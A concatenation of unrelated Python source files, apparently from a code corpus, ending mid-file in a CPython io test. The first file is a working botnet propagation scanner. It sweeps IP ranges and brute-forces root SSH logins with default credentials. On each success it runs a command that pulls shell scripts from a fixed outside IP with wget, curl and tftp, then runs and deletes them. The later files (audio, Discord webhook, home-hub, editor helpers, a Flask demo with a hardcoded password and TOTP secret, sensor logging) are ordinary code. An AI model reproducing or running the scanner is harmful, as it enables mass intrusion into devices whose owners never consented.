passwords = ["guest:guest"]
if sys.argv[4] == "telnet":
passwords = ["telnet:telnet"]
if len(sys.argv) < 4:
sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
print """\n\x1b[0;37m******************************
* \x1b[0;31mSCANNER STARTING\x1b[0;37m *
******************************\x1b[0m"""
def sshscanner(ip):
global passwords
try:
thisipisbad='no'
for badip in blacklisted:
if badip in ip:
thisipisbad='yes'
if thisipisbad=='yes':
sys.exit()
username='root'
password="0"
port = 22
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((ip, port))
data = str(s.recv(1024))
if "SSH" in data:
print("\x1b[1;35mInvalid \x1b[1;33m-- \x1b[1;35m" + ip + "\x1b[37m")
elif "ssh" in data:
print("\x1b[1;35mInvalid \x1b[1;33m-- \x1b[1;35m" + ip + "\x1b[37m")
else:
sys.exit()
s.close()
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
dobreak=False
for passwd in passwords:
if ":n/a" in passwd:
password=""
else:
password=passwd.split(":")[1]
if "n/a:" in passwd:
username=""
else:
username=passwd.split(":")[0]
try:
ssh.connect(ip, port = port, username=username, password=password, timeout=3)
break
except:
pass
badserver=True
stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
output = stdout.read()
if "inet addr" in output:
badserver=False
websites = [ ]
if badserver == False:
print("\x1b[1;37mAttempting Mikrotik \x1b[1;33m-- \x1b[1;35m" + ip + ":" + username + ":" + password + "\x1b[37m")
ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST; wget http://104.248.251.125/8UsA.sh; curl -O http://104.248.251.125/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 104.248.251.125 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 104.248.251.125; chmod 777 t8UsA2.sh; sh t8UsA2.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh")
vulns = open("Mikrotik.txt", "a").write(username + ":" + password + ":" + ip + "\n") #This is not needed u can take it out if u want
time.sleep(12)
ssh.close()
except Exception as e:
pass
if sys.argv[2] == "KOWAI":
ranges = ["188.16.000.000/188.19.255.255/181.112.0.0/201.245.180.0/"]
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
if sys.argv[2] != "KOWAI":
a = int(sys.argv[2].split(".")[0])
b = int(sys.argv[2].split(".")[1])
c = int(sys.argv[2].split(".")[2])
d = int(sys.argv[2].split(".")[3])
else:
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
x = 0
while(True):
try:
if sys.argv[2] != "KOWAI":
endaddr = sys.argv[3]
else:
endaddr = endrng
d += 1
ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
if sys.argv[2] == "KOWAI":
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
else:
break
if d > 255:
c += 1
d = 0
if c > 255:
b += 1
c = 0
if b > 255:
a += 1
b = 0
ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
if ipaddr == endaddr:
if sys.argv[2] == "KOWAI":
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
else:
break
if x > 500:
time.sleep(1)
x = 0
t = threading.Thread(target=sshscanner, args=(ipaddr,))
t.start()
except Exception as e:
pass
print "\x1b[37mDone\x1b[37m"
|
example_SampleSplitter_bufferhandling.py
|
# -*- coding: utf-8 -*-
#pylint: disable-msg=E0611, E1101, C0103, R0901, R0902, R0903, R0904, W0232
#------------------------------------------------------------------------------
# Copyright (c) 2007-2021, Acoular Development Team.
#------------------------------------------------------------------------------
"""
This example shows the different behaviour of SampleSplitter class
when the maximum size of a block buffer is reached for one object obtaining
data.
Three different settings can be made by the user:
* none: no warning, no error
* warning: a warning appears
* error: an error is raised
"""
from acoular import TimePower, MaskedTimeSamples, SampleSplitter
import threading
from time import sleep
samples = 25000
# =============================================================================
# set up data source
# =============================================================================
h5savefile = 'example_data.h5'
ts = MaskedTimeSamples(name=h5savefile,
start = 0,
stop = samples)
# =============================================================================
# connect SampleSplitter to data source
# =============================================================================
# set up Sample Splitter
ss = SampleSplitter(source = ts)
# =============================================================================
# create two objects to process the data
# =============================================================================
tp1 = TimePower(source=ss)
tp2 = TimePower(source=ss)
# register these objects at SampleSplitter
ss.register_object(tp1,tp2) # register objects
# =============================================================================
# define functions
# =============================================================================
def print_number_of_blocks_in_block_buffers():
"""
prints the number of data blocks in SampleSplitter-buffers. For each
subsequent object, a buffer exist.
"""
buffers = list(ss.block_buffer.values())
elements = [len(buf) for buf in buffers]
print(f"num blocks in buffers: {dict(zip(['tp1','tp2','tp3'], elements))}")
def get_data_fast(obj): # not time consuming function
""" gets data fast (pause 0.1 seconds)"""
for _ in obj.result(2048): #
print("tp1 calls sample splitter")
print_number_of_blocks_in_block_buffers()
sleep(0.1)
def get_data_slow(obj): # more time consuming function
""" gets data slow (pause 0.8 seconds)"""
for i in obj.result(2048): #
print("tp3 calls sample splitter")
print_number_of_blocks_in_block_buffers()
sleep(0.8)
# =============================================================================
# prepare and start processing in threads
# (no warning or error when block buffer is full)
# =============================================================================
print("buffer overflow behaviour == 'none'")
print("buffer size is set to a maximum of 5 elements")
ss.buffer_size=5
ss.buffer_overflow_treatment[tp1] = 'none'
ss.buffer_overflow_treatment[tp2] = 'none'
worker1 = threading.Thread(target=get_data_fast, args=(tp1,))
worker2 = threading.Thread(target=get_data_slow, args=(tp2,))
print("start threads")
worker1.start()
worker2.start()
worker1.join()
worker2.join()
print("threads finished")
# =============================================================================
# prepare and start processing in threads
# (only warning when block buffer is full)
# =============================================================================
print("buffer overflow behaviour == 'warning'")
print("buffer size is set to a maximum of 5 elements")
ss.buffer_size=5
ss.buffer_overflow_treatment[tp1] = 'warning'
ss.buffer_overflow_treatment[tp2] = 'warning'
worker1 = threading.Thread(target=get_data_fast, args=(tp1,))
worker2 = threading.Thread(target=get_data_slow, args=(tp2,))
print("start threads")
worker1.start()
worker2.start()
worker1.join()
worker2.join()
print("threads finished")
# =============================================================================
# prepare and start processing in threads
# (raise error when block buffer is full)
# =============================================================================
print("buffer overflow behaviour == 'error'")
print("buffer size is set to a maximum of 5 elements")
ss.buffer_size=5
ss.buffer_overflow_treatment[tp1] = 'error'
ss.buffer_overflow_treatment[tp2] = 'error'
worker1 = threading.Thread(target=get_data_fast, args=(tp1,))
worker2 = threading.Thread(target=get_data_slow, args=(tp2,))
print("start threads")
worker1.start()
worker2.start()
worker1.join()
worker2.join()
print("threads finished")
|
run.py
|
import base64
import datetime
import io
import json
import re
import socket
import sys
import threading
import zlib
from collections import defaultdict
from configparser import ConfigParser
from pathlib import Path
from socketserver import StreamRequestHandler
from socketserver import ThreadingTCPServer
from typing import Optional
from typing import Tuple
import discord
import logbook
import pytz
import requests
from PIL import Image
from discord import RequestsWebhookAdapter
from discord import Webhook
from logbook import Logger
from logbook.handlers import RotatingFileHandler
from logbook.handlers import StreamHandler
StreamHandler(
sys.stdout, level="INFO", bubble=True).push_application()
RotatingFileHandler(
"tklserver.log", level="INFO", bubble=True).push_application()
logger = Logger("tklserver")
logbook.set_datetime_format("local")
STEAM_PROFILE_URL = "https://www.steamcommunity.com/profiles/{id}"
DATE_FMT = "%Y/%m/%d - %H:%M:%S"
TKL_MSG_PAT = re.compile(
r"\(([0-9]{4}/[0-9]{2}/[0-9]{2}\s-\s[0-9]{2}:[0-9]{2}:[0-9]{2})\)\s'(.+)'\s"
r"\[(0x[0-9a-fA-F]+)\]\s(killed|teamkilled)\s'(.+)'\s\[(0x[0-9a-fA-F]+)\]\swith\s<(.+)>")
class ImageCache:
def __init__(self, image_package: Path):
self._cache = {}
with image_package.open("rb") as f:
data = f.read()
data_decomp = zlib.decompress(data)
self._cache = json.loads(data_decomp)
def __getitem__(self, item):
if item is None:
item = "__DEFAULT"
image = self._cache[item]
if isinstance(image, io.BytesIO):
logger.info("returning cached image for: {i}", i=item)
image.seek(0)
return image
if image.startswith("__"):
image = image.split("__")[1]
return self.__getitem__(image)
logger.info("loading image for: {i}", i=item)
b64_img = io.BytesIO(base64.b64decode(image))
pil_image = Image.open(b64_img)
png_image = io.BytesIO()
pil_image.save(png_image, "PNG")
self._cache[item] = png_image
png_image.seek(0)
return png_image
class TKLServer(ThreadingTCPServer):
daemon_threads = True
def __init__(self, *args, stop_event: threading.Event,
discord_config: dict, image_cache: Optional[ImageCache] = None,
**kwargs):
super().__init__(*args, **kwargs)
self._stop_event = stop_event
self._discord_config = discord_config
self.image_cache = image_cache
@property
def stop_requested(self) -> bool:
return self._stop_event.is_set()
@property
def discord_config(self) -> dict:
return self._discord_config
def get_kill_icon(self, damage_type: str):
try:
return self.image_cache[damage_type]
except KeyError:
return None
class TKLRequestHandler(StreamRequestHandler):
def __init__(self, request, client_address, server: TKLServer):
self.server: TKLServer = server
super().__init__(request, client_address, server)
def execute_webhook(self, ident: str, msg: str):
embed: Optional[discord.Embed] = None
damage_type = ""
try:
msg_match = TKL_MSG_PAT.match(msg)
groups = msg_match.groups()
if not msg_match:
logger.warn("message does not match pattern")
else:
date = groups[0]
date = datetime.datetime.strptime(date, DATE_FMT)
date = date.astimezone(pytz.utc)
killer = groups[1]
killer_id = int(groups[2], 16)
killer_profile = STEAM_PROFILE_URL.format(id=killer_id)
killed = groups[4]
killed_id = int(groups[5], 16)
killed_profile = STEAM_PROFILE_URL.format(id=killed_id)
damage_type = groups[6]
killer = discord.utils.escape_mentions(killer)
killer = discord.utils.escape_markdown(killer)
killed = discord.utils.escape_mentions(killed)
killed = discord.utils.escape_markdown(killed)
action = groups[3]
if killed_id == killer_id:
action = "suicide"
damage_type = damage_type.replace("SUICIDE_", "")
action_formatted = {
"killed": "Kill",
"teamkilled": "Team Kill",
"suicide": "Suicide",
}[action]
color = {
"killed": 3066993,
"teamkilled": 15158332,
"suicide": 9807270,
}[action]
if killer_id == 0:
killer_id_link = "BOT"
else:
killer_id_link = f"[{killer_id}]({killer_profile})"
if killed_id == 0:
killed_id_link = "BOT"
else:
killed_id_link = f"[{killed_id}]({killed_profile})"
# Both are bots. Avoid false "Suicide".
if (killed_id == 0) and (killer_id == 0):
action_formatted = "Bot Killed Bot"
embed = discord.Embed(
title=action_formatted,
timestamp=date,
color=color,
).add_field(
name="Killer",
value=killer,
inline=True,
).add_field(
name="Victim",
value=killed,
inline=True,
).add_field(
name="\u200b",
value="\u200b",
).add_field(
name="Killer ID",
value=killer_id_link,
inline=True,
).add_field(
name="Victim ID",
value=killed_id_link,
inline=True,
).add_field(
name="\u200b",
value="\u200b",
).add_field(
name="Damage Type",
value=damage_type,
)
except Exception as e:
logger.error("error creating embed message: {e}",
e=e, exc_info=True)
webhook_id = self.server.discord_config[ident][0]
webhook_token = self.server.discord_config[ident][1]
webhook = Webhook.partial(
id=webhook_id, token=webhook_token, adapter=RequestsWebhookAdapter()
)
if embed is not None:
logger.info("sending webhook embed for {i}", i=ident)
try:
kill_icon = self.server.get_kill_icon(damage_type)
if kill_icon:
image_file = discord.File(kill_icon, filename="image.png")
embed.set_image(url="attachment://image.png")
webhook.send(file=image_file, embed=embed)
else:
webhook.send(embed=embed)
except Exception as e:
logger.error(e, exc_info=True)
else:
logger.info("sending webhook message for {i}", i=ident)
webhook.send(content=msg)
def handle(self):
try:
logger.info("connection opened from: {sender}",
sender=self.client_address)
while not self.server.stop_requested:
data = self.rfile.readline()
if data.startswith(b"\x00") or not data:
logger.info(
"received quit request from {sender}, closing connection",
sender=self.client_address)
break
logger.debug("raw data: {data}", data=data)
data = str(data, encoding="latin-1").strip()
ident = data[:4]
data = data[4:]
logger.debug("{i}: {data}", i=ident, data=data)
if ident in self.server.discord_config:
self.execute_webhook(ident, data)
else:
logger.error("server unique ID {i} not in Discord config", i=ident)
except (ConnectionError, socket.error) as e:
logger.error("{sender}: connection error: {e}",
sender=self.client_address, e=e)
except Exception as e:
logger.error("error when handling request from {addr}: {e}",
addr=self.client_address, e=e)
logger.exception(e)
def parse_webhook_url(url: str) -> Tuple[int, str]:
resp = requests.get(url).json()
_id = int(resp["id"])
token = resp["token"]
return _id, token
def load_config() -> dict:
cp = ConfigParser()
cp.read("tklserver.ini")
sections = cp.sections()
ret = defaultdict(dict, cp)
for section in sections:
if section.startswith("rs2server"):
ident = section.split(".")[1]
url = cp[section].get("webhook_url")
try:
ret["discord"][ident] = parse_webhook_url(url)
except Exception as e:
logger.error("webhook URL failure for RS2 server ID={i}: {e}",
i=ident, e=e)
return ret
def terminate(stop_event: threading.Event):
stop_event.set()
def main():
config = load_config()
image_cache = None
image_cache_path = Path("kill_icons.zlib")
try:
logger.info(f"attempting to load image cache from: {image_cache_path.absolute()}")
image_cache = ImageCache(image_cache_path)
logger.info("image cache loaded successfully")
except Exception as e:
logger.exception(f"error loading image cache: {e}")
try:
server_config = config["tklserver"]
port = server_config.getint("port")
host = server_config["host"]
if not port:
logger.error("port not set, exiting...")
sys.exit(-1)
except (ValueError, KeyError) as e:
logger.debug("invalid config: {e}", e=e, exc_info=True)
logger.error("invalid config, exiting...")
sys.exit(-1)
stop_event = threading.Event()
addr = (host, port)
server = None
try:
server = TKLServer(addr, TKLRequestHandler, stop_event=stop_event,
discord_config=config["discord"],
image_cache=image_cache)
logger.info("serving at: {host}:{port}", host=addr[0], port=addr[1])
logger.info("press CTRL+C to shut down the server")
server.serve_forever()
except KeyboardInterrupt:
logger.info("server stop requested")
finally:
if server:
t = threading.Thread(target=terminate, args=(stop_event,))
t.start()
t.join()
server.shutdown()
server.server_close()
logger.info("server shut down successfully")
if __name__ == "__main__":
main()
|
hub.py
|
import requests
import os
import threading
import binascii
import time
import sys
import logbook
logger = logbook.Logger(__name__)
class HubConn:
def __init__(self, host, port, username=None, password=None, poll_time=1, timeout=0.1):
self._host = host
self._port = port
self._username = username
self._password = password
self._poll_time = poll_time
self._read_timeout = timeout
self._open = True
self._lock = threading.RLock()
self._idx = -1 # Buffer index
self._read_cond = threading.Condition()
self._read_buffer = bytearray()
# Start threads
self._reader = threading.Thread(target=self._read_thread, daemon=True)
self._reader.stop = self.close
self._reader.start()
def __del__(self):
if self.is_open:
self.close()
@property
def is_open(self):
with self._lock:
return self._open
def close(self):
with self._lock:
self._open = False
def read(self, size=1):
with self._read_cond:
if len(self._read_buffer) < size:
self._read_cond.wait(self._read_timeout)
if len(self._read_buffer) >= size:
data = self._read_buffer[:size]
self._read_buffer = self._read_buffer[size:]
return data
else:
return bytes()
def write(self, data):
if not self.is_open:
return
try:
self._write(data)
except:
logger.error('Failed to connect to hub')
logger.trace(sys.exc_info()[0])
self.close()
def flush(self):
pass
def _get(self, path):
url = 'http://{}:{}{}'.format(self._host, self._port, os.path.join('/', path))
logger.trace('Fetching {}'.format(url))
if self._username and self._password:
res = requests.get(url, auth=(self._username, self._password))
else:
res = requests.get(url)
response = res.text
logger.trace('Got {}: {}'.format(res.status_code, response))
if res.status_code != 200:
self.close()
raise IOError('Could not fetch {}'.format(url))
return response
def _write(self, data):
with self._lock:
self._poll()
self._clear()
self._get('/3?{}=I=3'.format(binascii.hexlify(data).decode('utf-8')))
def _clear(self):
with self._lock:
self._get('/1?XB=M=1')
self._idx = 0
def _poll(self):
with self._lock:
xml = self._get('/buffstatus.xml')
bufstatus = xml.split('<BS>')[1].split('</BS>')[0].strip()
# Convert the buffer status to a buffer and an index
buf = binascii.unhexlify(bufstatus[:-2])
index = int(bufstatus[-2:], base=16)
if self._idx < 0:
self._idx = index
return
msg = bytes()
if index < self._idx:
after = buf[self._idx:]
before = buf[:index]
msg = after + before
else:
msg = buf[self._idx:index]
self._idx = index
with self._read_cond:
self._read_buffer.extend(msg)
self._read_cond.notifyAll()
def _read_thread(self):
while self.is_open:
try:
self._poll()
time.sleep(self._poll_time)
except:
self.close()
logger.error('Failed to connect to hub')
logger.trace(sys.exc_info()[0])
logger.trace('Exiting read thread')
|
helpers.py
|
from LSP.plugin.core.typing import Any, Callable, Dict, List, Optional, Tuple
import os
import re
import sublime
import subprocess
import threading
StringCallback = Callable[[str], None]
SemanticVersion = Tuple[int, int, int]
def run_command_sync(
args: List[str], cwd: Optional[str] = None, extra_env: Optional[Dict[str, str]] = None
) -> Tuple[str, Optional[str]]:
"""
Runs the given command synchronously.
:returns: A two-element tuple with the returned value and an optional error. If running the command has failed, the
first tuple element will be empty string and the second will contain the potential `stderr` output. If the
command has succeeded then the second tuple element will be `None`.
"""
try:
env = None
if extra_env:
env = os.environ.copy()
env.update(extra_env)
output = subprocess.check_output(
args, cwd=cwd, shell=sublime.platform() == 'windows', stderr=subprocess.STDOUT, env=env)
return (decode_bytes(output).strip(), None)
except subprocess.CalledProcessError as error:
return ('', decode_bytes(error.output).strip())
def run_command_async(args: List[str], on_success: StringCallback, on_error: StringCallback, **kwargs: Any) -> None:
"""
Runs the given command asynchronously.
On success calls the provided `on_success` callback with the value the the command has returned.
On error calls the provided `on_error` callback with the potential `stderr` output.
"""
def execute(on_success: StringCallback, on_error: StringCallback, args: List[str]) -> None:
result, error = run_command_sync(args, **kwargs)
on_error(error) if error is not None else on_success(result)
thread = threading.Thread(target=execute, args=(on_success, on_error, args))
thread.start()
def decode_bytes(data: bytes) -> str:
"""
Decodes provided bytes using `utf-8` decoding, ignoring potential decoding errors.
"""
return data.decode('utf-8', 'ignore')
def parse_version(version: str) -> SemanticVersion:
"""
Converts a version string to a version tuple (major, minor, patch).
:returns: The semantic version in form of a 3-element tuple.
"""
match = re.match(r'v?(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d+)(?:-.+)?', version)
if match:
major, minor, patch = match.groups()
return int(major), int(minor), int(patch)
else:
return 0, 0, 0
def version_to_string(version: SemanticVersion) -> str:
"""
Returns a string representation of a version tuple.
"""
return '.'.join([str(c) for c in version])
def log_and_show_message(message: str, additional_logs: str = None, show_in_status: bool = True) -> None:
"""
Logs the message in the console and optionally sets it as a status message on the window.
:param message: The message to log or show in the status.
:param additional_logs: The extra value to log on a separate line.
:param show_in_status: Whether to briefly show the message in the status bar of the current window.
"""
print(message, '\n', additional_logs) if additional_logs else print(message)
if show_in_status:
sublime.active_window().status_message(message)
|
web.py
|
#!/usr/bin/env python3
from random import random
import threading
from flask import Flask
from flask import redirect
from flask import render_template
from flask import request
from flask import session
from flask import url_for
import pyotp
server_results = {}
def view():
if request.form:
if request.form.get('user') and request.form.get('pass'):
if (request.form.get('user') == 'admin'
and request.form.get('pass') == 'qwerty'):
session['secondfactor'] = True
else:
session['authenticated'] = False
session['secondfactor'] = False
elif request.form.get('token') and session.get('secondfactor', False):
totp = pyotp.TOTP('base32secret3232')
if totp.verify(request.form.get('token'), valid_window=3):
session['authenticated'] = True
else:
session['authenticated'] = False
session['secondfactor'] = False
else:
session['authenticated'] = False
session['secondfactor'] = False
return redirect(url_for('index'))
authenticated = session.get('authenticated', False)
secondfactor = session.get('secondfactor', False)
return render_template('index.html',
authenticated=authenticated,
secondfactor=secondfactor,
results=server_results)
def main():
app = Flask(__name__)
app.add_url_rule('/', 'index', view_func=view, methods=['GET', 'POST'])
app.secret_key = 'development key ' + str(random())
app.run(port=5000, debug=False, use_reloader=False)
def start_server():
flask_thread = threading.Thread(target=main)
flask_thread.setDaemon(True)
flask_thread.start()
def update_server_data(data):
global server_results
server_results = data
if __name__ == "__main__":
main()
|
gatosratones.py
|
import threading
import time
ratones = 0
mutex = threading.Semaphore(1)
plato_disponible = threading.Semaphore(1)
torniquete = threading.Semaphore(1)
def gato(num):
global ratones
print "El gato %d esta en la casa" % num
torniquete.acquire()
if ratones >= 1:
print "Hay %d ratones en la casa!" %ratones
gato_come_raton(num)
ratones = ratones - 1
plato_disponible.acquire()
gato_come(num)
print "Soy el gato %d y termine de comer" %num
plato_disponible.release()
torniquete.release()
def raton(num):
global ratones
torniquete.acquire()
torniquete.release()
print "El raton %d esta en la casa" % num
mutex.acquire()
ratones = ratones + 1
if ratones == 1:
plato_disponible.acquire()
mutex.release()
raton_come(num)
mutex.acquire()
ratones = ratones - 1
if ratones == 0:
plato_disponible.release()
print "Soy el raton %d y termine de comer" %num
mutex.release()
def gato_come(num):
print "Se acerca el gato %d" %num
print "Gato %d: comiendo..." % num
time.sleep(1)
def raton_come(num):
print "Raton %d comiendo.........." % num
time.sleep(7)
def gato_come_raton(num):
print "El gato %d se comio un raton" %num
def lanza_raton():
for i in range(30):
threading.Thread(target=raton, args=[i]).start()
time.sleep(0.3)
def lanza_gato():
for i in range(30):
threading.Thread(target=gato, args=[i]).start()
time.sleep(5)
threading.Thread(target=lanza_gato).start()
threading.Thread(target=lanza_raton).start()
|
logger.py
|
import collections, threading, traceback
import paho.mqtt.client as mqtt
try:
# Transitional fix for breaking change in LTR559
from ltr559 import LTR559
ltr559 = LTR559()
except ImportError:
import ltr559
from bme280 import BME280
from pms5003 import PMS5003
from enviroplus import gas
class EnvLogger:
def __init__(self, client_id, host, port, username, password, prefix, use_pms5003, num_samples, retain):
self.bme280 = BME280()
self.prefix = prefix
self.connection_error = None
self.client = mqtt.Client(client_id=client_id)
self.client.on_connect = self.__on_connect
self.client.username_pw_set(username, password)
self.client.connect(host, port)
self.samples = collections.deque(maxlen=num_samples)
self.latest_pms_readings = {}
if use_pms5003:
self.pm_thread = threading.Thread(target=self.__read_pms_continuously)
self.pm_thread.daemon = True
self.pm_thread.start()
self.retain = retain
def __on_connect(self, client, userdata, flags, rc):
errors = {
1: "incorrect MQTT protocol version",
2: "invalid MQTT client identifier",
3: "server unavailable",
4: "bad username or password",
5: "connection refused"
}
if rc > 0:
self.connection_error = errors.get(rc, "unknown error")
def __read_pms_continuously(self):
"""Continuously reads from the PMS5003 sensor and stores the most recent values
in `self.latest_pms_readings` as they become available.
If the sensor is not polled continously then readings are buffered on the PMS5003,
and over time a significant delay is introduced between changes in PM levels and
the corresponding change in reported levels."""
pms = PMS5003()
while True:
try:
pm_data = pms.read()
self.latest_pms_readings = {
"particulate/1.0": pm_data.pm_ug_per_m3(1.0, atmospheric_environment=True),
"particulate/2.5": pm_data.pm_ug_per_m3(2.5, atmospheric_environment=True),
"particulate/10.0": pm_data.pm_ug_per_m3(None, atmospheric_environment=True),
}
except:
print("Failed to read from PMS5003. Resetting sensor.")
traceback.print_exc()
pms.reset()
def take_readings(self):
gas_data = gas.read_all()
readings = {
"proximity": ltr559.get_proximity(),
"lux": ltr559.get_lux(),
"temperature": self.bme280.get_temperature(),
"pressure": self.bme280.get_pressure(),
"humidity": self.bme280.get_humidity(),
"gas/oxidising": gas_data.oxidising,
"gas/reducing": gas_data.reducing,
"gas/nh3": gas_data.nh3,
}
readings.update(self.latest_pms_readings)
return readings
def publish(self, topic, value, retain):
topic = self.prefix.strip("/") + "/" + topic
self.client.publish(topic, str(value), retain=retain)
def update(self, publish_readings=True):
self.samples.append(self.take_readings())
if publish_readings:
for topic in self.samples[0].keys():
value_sum = sum([d[topic] for d in self.samples])
value_avg = value_sum / len(self.samples)
self.publish(topic, value_avg, retain=self.retain)
self.client.loop()
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as a attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import os
import sys
import time
import array
import random
import unittest
import weakref
import abc
import signal
import errno
import warnings
import pickle
from itertools import cycle, count
from collections import deque
from test import support
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise IOError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
